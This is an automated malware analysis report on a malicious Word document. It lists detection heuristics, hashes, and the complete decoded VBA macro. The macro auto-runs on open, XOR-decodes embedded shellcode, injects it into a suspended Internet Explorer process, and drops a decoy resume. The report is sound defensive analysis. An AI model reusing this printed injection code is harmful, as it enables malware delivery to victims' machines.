Verdict: MALICIOUS (risk score 508)

Malware Insights

MITRE ATT&CK: T1203 Exploitation for Client Execution; T1059.005 Visual Basic
The sample is a malicious Microsoft Word document that leverages CVE-2007-3899 to achieve arbitrary code execution. The VBA macro contains calls to WinAPI functions such as CreateRemoteThread, VirtualAllocEx, and WriteProcessMemory, indicating it is designed to inject and run shellcode. The presence of these API calls and the specific CVE exploit strongly suggest a client-side execution attack.
Heuristics (16)

- CVE-2007-3899 — Microsoft Word malformed string memory corruption (critical, CVE likely, CVE_2007_3899): Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- OLE with Ole10Native — possible CVE-2026-21514 exploitation (high, CVE likely, CVE_2026_21514): Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
- ClamAV: Doc.Macro.Injection-6355574-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0.
- Reference to WriteProcessMemory API (critical, SC_STR_WRITEPROCESSMEMORY).
- Reference to CreateRemoteThread API (critical, SC_STR_CREATEREMOTETHREAD).
- XOR-encoded strings (key 0x5A) (critical, SC_XOR_ENCODED): Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'.
  - Disassembly: attempted x86 opcode disassembly of the flagged region at offset 0003C635. The bytes are XOR-encoded data rather than code: many of them are 0x5A (the key itself, which disassembles as `pop edx`), and XOR-decoding the leading bytes 1b 1e 0c 1b 0a 13 69 68 74 1e 16 16 with 0x5A yields the string 'ADVAPI32.DLL' reported above.
- Reference to CreateProcess API (high, SC_STR_CREATEPROCESS).
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
  - CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script: `Dim AJrHxoPdvR` / `Set AJrHxoPdvR = CreateObject("ADODB.Stream")` / `AJrHxoPdvR.Type = NRIiiFrAlf`
  - AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script: `Sub AutoOpen()` / `VDxLHmMTIbel`
  - Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched lines in script: `End Sub` / `Sub Workbook_Open()` / `VDxLHmMTIbel`
  - Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched lines in script: `If Len(Environ("ProgramW6432")) > 0 Then` / `nZFigtwuGbdD = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"`
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (3)

Files carved from inside the sample during analysis.

macros.bas
- Kind: vba-macro
- Source: oletools.olevba.extract_macros (decoded VBA source)
- Size: 9300 bytes
- SHA-256: 3aa52b0661b024835cfabae0c4abec7015b47dceb782e337975332aac8096bdc
- Detection: ClamAV: No threats found. Obfuscation or payload: likely; 87 of 148 identifiers look randomly generated (e.g. 'TDrhCQJnrifCqxr') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const NRIiiFrAlf = 1
Const BqqNhNUcmf = 1, rEBKXSqcKr = 2, vQgegehNfg = 8
Private Type gTdpBrvrhSQZ
NMcENjMFkRSO As Long
OCmJmXLoqHrW As Long
llivmFMqqlLI As Long
AwUTBZgtzTLq As Long
End Type
Private Type qbXAWjkAEfgV
STHpQermPhOq As Long
DmMduZYAaJZQ As String
XxzIYuAKnJVz As String
cDVJPwMVTDrv As String
JPopwcIkpOyX As Long
dxcmTnzRgvST As Long
zoRvXTaWEnio As Long
LvzlCVrVbOpk As Long
XlrUHRCPFYSZ As Long
AMuGsfcnQyUU As Long
TfvJbwmnaQuR As Long
IRzAhJZUznuP As Long
tzgDyFJtfOEd As Integer
WoRDMgqAxWQW As Integer
nqlkwbZgeyBq As Long
aggsNIAhSOdW As Long
IXVFlmllIEIa As Long
yxmnkVWPpQUG As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function OseHhJMQLqkE Lib "kernel32" Alias "CreateRemoteThread" (ByVal NMcENjMFkRSO As Long, ByVal fwfKqUhjeFFB As Long, ByVal YEmrfuUoNdfX As Long, ByVal IUezTJMJPbuW As LongPtr, HsgcuvjvFqnm As Long, ByVal muBCecVWSNNm As Long, YXhMgrppYHHQ As Long) As LongPtr
Private Declare PtrSafe Function oNeBkhkTruoY Lib "kernel32" Alias "VirtualAllocEx" (ByVal NMcENjMFkRSO As Long, ByVal SZEJYLkvBxje As Long, ByVal okoASmEaVjSH As Long, ByVal UlWATCgZYUxS As Long, ByVal uQfrJECmljBM As Long) As LongPtr
Private Declare PtrSafe Function ZqiGvZGgOSNR Lib "kernel32" Alias "WriteProcessMemory" (ByVal NMcENjMFkRSO As Long, ByVal ZqyucEzXWPoP As LongPtr, ByRef YUiRyoCVhtSY As Any, ByVal sqLPlyqerqME As Long, ByVal poujdaJfLxyX As LongPtr) As LongPtr
Private Declare PtrSafe Function WbtuVpnlDsVo Lib "kernel32" Alias "CreateProcessA" (ByVal VMFUlnPVjaxU As String, ByVal oBddFYysREmv As String, HDjIUifgzuqD As Any, fwfKqUhjeFFB As Any, ByVal fgIEpFJUJebx As Long, ByVal muBCecVWSNNm As Long, FhKMJbTWkPSE As Any, ByVal XErBjdKAytYR As String, sZzkZGuamkCC As qbXAWjkAEfgV, pCvFeAUkNNyP As gTdpBrvrhSQZ) As Long
#Else
Private Declare Function OseHhJMQLqkE Lib "kernel32" Alias "CreateRemoteThread" (ByVal NMcENjMFkRSO As Long, ByVal fwfKqUhjeFFB As Long, ByVal YEmrfuUoNdfX As Long, ByVal IUezTJMJPbuW As Long, HsgcuvjvFqnm As Long, ByVal muBCecVWSNNm As Long, YXhMgrppYHHQ As Long) As Long
Private Declare Function oNeBkhkTruoY Lib "kernel32" Alias "VirtualAllocEx" (ByVal NMcENjMFkRSO As Long, ByVal SZEJYLkvBxje As Long, ByVal okoASmEaVjSH As Long, ByVal UlWATCgZYUxS As Long, ByVal uQfrJECmljBM As Long) As Long
Private Declare Function ZqiGvZGgOSNR Lib "kernel32" Alias "WriteProcessMemory" (ByVal NMcENjMFkRSO As Long, ByVal ZqyucEzXWPoP As Long, ByRef YUiRyoCVhtSY As Any, ByVal sqLPlyqerqME As Long, ByVal poujdaJfLxyX As Long) As Long
Private Declare Function WbtuVpnlDsVo Lib "kernel32" Alias "CreateProcessA" (ByVal VMFUlnPVjaxU As String, ByVal oBddFYysREmv As String, HDjIUifgzuqD As Any, fwfKqUhjeFFB As Any, ByVal fgIEpFJUJebx As Long, ByVal muBCecVWSNNm As Long, FhKMJbTWkPSE As Any, ByVal lpCurrentDriectory As String, sZzkZGuamkCC As qbXAWjkAEfgV, pCvFeAUkNNyP As gTdpBrvrhSQZ) As Long
#End If
Sub VDxLHmMTIbel()
Dim BnoNNMaijKfg As Long, GxCztMkhlMLu As Variant, JeftPgmFKpOh As Long
Dim YDZDkZlUpgWJ As gTdpBrvrhSQZ
Dim bhfLHIGRcwXX As qbXAWjkAEfgV
Dim JlEnfwrhmGkc As String
Dim nZFigtwuGbdD As String
Dim KuXLZDAZgl As String
Dim NGLgwOfHBv() As Byte
Dim dHhZOVoVCs As Boolean
#If VBA7 Then
Dim KHgyNwkPiBDc As LongPtr, TgCxHHgYnHWt As LongPtr
#Else
Dim KHgyNwkPiBDc As Long, TgCxHHgYnHWt As Long
#End If
GxCztMkhlMLu = lbderjmx
If Len(Environ("ProgramW6432")) > 0 Then
nZFigtwuGbdD = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
Else
nZFigtwuGbdD = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
End If
TgCxHHgYnHWt = WbtuVpnlDsVo(JlEnfwrhmGkc, nZFigtwuGbdD, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, JlEnfwrhmGkc, bhfLHIGRcwXX, YDZDkZlUpgWJ)
KHgyNwkPiBDc = oNeBkhkTruoY(YDZDkZlUpgWJ.NMcENjMFkRSO, 0, UBound(GxCztMkhlMLu), &H1000, &H40)
For JeftPgmFKpOh = LBound(GxCztMkhlMLu) To UBound(GxCztMkhlMLu)
BnoNNMaijKfg = GxCztMkhlMLu(JeftPgmFKpOh)
TgCxHHgYnHWt = ZqiGvZGgOSNR(YDZDkZlUpgWJ.NMcENjMFkRSO, KHgyNwkPiBDc + JeftPgmFKpOh, BnoNNMaijKfg, 1, ByVal 0&)
Next JeftPgmFKpOh
TgCxHHgYnHWt = OseHhJMQLqkE(YDZDkZlUpgWJ.NMcENjMFkRSO, 0, 0, KHgyNwkPiBDc, 0, 0, 0)
KuXLZDAZgl = Environ("TEMP") & "\Resume (1).doc"
NGLgwOfHBv = dvmmoouq
dHhZOVoVCs = vSfONPrzzr(KuXLZDAZgl, NGLgwOfHBv)
Set temp = ActiveDocument
Documents.Open (KuXLZDAZgl)
temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub
Function vSfONPrzzr(NygUAaOqfK, YsxbZZEgtK)
Dim AJrHxoPdvR
Set AJrHxoPdvR = CreateObject("ADODB.Stream")
AJrHxoPdvR.Type = NRIiiFrAlf
AJrHxoPdvR.Open
AJrHxoPdvR.Write YsxbZZEgtK
AJrHxoPdvR.SaveToFile NygUAaOqfK, rEBKXSqcKr
End Function
Sub AutoOpen()
VDxLHmMTIbel
End Sub
Sub Workbook_Open()
VDxLHmMTIbel
End Sub
Function lbderjmx() As Byte()
Dim ZVIoJfIFaGSIfOE() As Byte
Dim TFZYXEeUZlmopzP As Long
Dim HUiXuSHstkHhHjb(7) As Byte
Dim JeftPgmFKpOh As Long
Dim TDrhCQJnrifCqxr() As Byte
Dim dHhZOVoVCs As Boolean
ZVIoJfIFaGSIfOE = PtDMAOUBaA(ActiveDocument.FullName)
TFZYXEeUZlmopzP = xOwxkhxtfK(ZVIoJfIFaGSIfOE)
HUiXuSHstkHhHjb(0) = 50
HUiXuSHstkHhHjb(1) = 50
HUiXuSHstkHhHjb(2) = 48
HUiXuSHstkHhHjb(3) = 74
HUiXuSHstkHhHjb(4) = 85
HUiXuSHstkHhHjb(5) = 80
HUiXuSHstkHhHjb(6) = 80
HUiXuSHstkHhHjb(7) = 67
JeftPgmFKpOh = myxPEnEznm(ZVIoJfIFaGSIfOE, HUiXuSHstkHhHjb)
TDrhCQJnrifCqxr = hUOHYwtiAP(ZVIoJfIFaGSIfOE, JeftPgmFKpOh + xOwxkhxtfK(HUiXuSHstkHhHjb), 212481 - 1)
dHhZOVoVCs = lenXkJRwCo(TDrhCQJnrifCqxr, xOwxkhxtfK(TDrhCQJnrifCqxr))
lbderjmx = TDrhCQJnrifCqxr
End Function
Function dvmmoouq() As Byte()
Dim ZVIoJfIFaGSIfOE() As Byte
Dim TFZYXEeUZlmopzP As Long
Dim HUiXuSHstkHhHjb(7) As Byte
Dim JeftPgmFKpOh As Long
Dim TDrhCQJnrifCqxr() As Byte
Dim dHhZOVoVCs As Boolean
ZVIoJfIFaGSIfOE = PtDMAOUBaA(ActiveDocument.FullName)
TFZYXEeUZlmopzP = xOwxkhxtfK(ZVIoJfIFaGSIfOE)
HUiXuSHstkHhHjb(0) = 77
HUiXuSHstkHhHjb(1) = 86
HUiXuSHstkHhHjb(2) = 67
HUiXuSHstkHhHjb(3) = 71
HUiXuSHstkHhHjb(4) = 84
HUiXuSHstkHhHjb(5) = 77
HUiXuSHstkHhHjb(6) = 78
HUiXuSHstkHhHjb(7) = 89
JeftPgmFKpOh = myxPEnEznm(ZVIoJfIFaGSIfOE, HUiXuSHstkHhHjb)
TDrhCQJnrifCqxr = hUOHYwtiAP(ZVIoJfIFaGSIfOE, JeftPgmFKpOh + xOwxkhxtfK(HUiXuSHstkHhHjb), 90842 - 1)
dHhZOVoVCs = lenXkJRwCo(TDrhCQJnrifCqxr, xOwxkhxtfK(TDrhCQJnrifCqxr))
dvmmoouq = TDrhCQJnrifCqxr
End Function
Function xOwxkhxtfK(abArray() As Byte) As Long
Dim nLen As Long
xOwxkhxtfK = UBound(abArray) - LBound(abArray) + 1
End Function
Function PtDMAOUBaA(AgBWmTlLLC As String)
Dim eIAQcGBWHj() As Byte
Dim PkIVoZuMej As Integer: PkIVoZuMej = FreeFile
Open AgBWmTlLLC For Binary Access Read As #PkIVoZuMej
ReDim eIAQcGBWHj(0 To LOF(PkIVoZuMej) - 1)
Get #PkIVoZuMej, , eIAQcGBWHj
Close #PkIVoZuMej
PtDMAOUBaA = eIAQcGBWHj
End Function
Function myxPEnEznm(gtbBYyanTB() As Byte, iWKjItTzLF() As Byte) As Long
Dim fSqoSTMdTb As Boolean
Dim kGEmWdgIkt As Long
Dim aEuGjhzCkT As Long
Dim fOTwAmhgxY As Long
Dim XyPBNBKplC As Long
fSqoSTMdTb = False
fOTwAmhgxY = xOwxkhxtfK(gtbBYyanTB)
XyPBNBKplC = xOwxkhxtfK(iWKjItTzLF)
For kGEmWdgIkt = 0 To fOTwAmhgxY
fSqoSTMdTb = True
For aEuGjhzCkT = 0 To XyPBNBKplC - 1
If gtbBYyanTB(kGEmWdgIkt + aEuGjhzCkT) <> iWKjItTzLF(aEuGjhzCkT) Then
fSqoSTMdTb = False
Exit For
End If
Next aEuGjhzCkT
If fSqoSTMdTb = True Then
Exit For
End If
Next kGEmWdgIkt
If fSqoSTMdTb = False Then
myxPEnEznm = -1
Else
myxPEnEznm = kGEmWdgIkt
End If
End Function
Function hUOHYwtiAP(gtbBYyanTB() As Byte, jEsGhhVMxM As Long, doVCDICsGw As Long) As Byte()
Dim rvtitxUTyD() As Byte
Dim kGEmWdgIkt As Long
For kGEmWdgIkt = 0 To doVCDICsGw
ReDim Preserve rvtitxUTyD(kGEmWdgIkt)
rvtitxUTyD(kGEmWdgIkt) = gtbBYyanTB(jEsGhhVMxM + kGEmWdgIkt)
Next kGEmWdgIkt
hUOHYwtiAP = rvtitxUTyD
End Function
Function lenXkJRwCo(SmsKmaCfMx() As Byte, doVCDICsGw As Long)
Dim zYUrlwVwjj As Byte
Dim wVRMdzFPQx As Long
zYUrlwVwjj = 90
For wVRMdzFPQx = 0 To doVCDICsGw - 1
SmsKmaCfMx(wVRMdzFPQx) = SmsKmaCfMx(wVRMdzFPQx) Xor zYUrlwVwjj
Next wVRMdzFPQx
End Function
ole10native_00.bin
- Kind: ole-package
- Source: OLE Ole10Native stream: ObjectPool/_1612163912/Ole10Native
- Size: 91316 bytes
- SHA-256: 9b90717be31e6d1a6df95b41aede092591a91822ed4739b975f274a8ad5a51de
- Detection: ClamAV: No threats found. Obfuscation or payload: likely; carved artifact entropy is 7.92, consistent with packed or encrypted content.
ole10native_01.bin
- Kind: ole-package
- Source: OLE Ole10Native stream: ObjectPool/_1612163913/Ole10Native
- Size: 212955 bytes
- SHA-256: 9750264e1b3a8771460a1795cd40f8a237c288350c2bd77900dbf8a8b93f29ea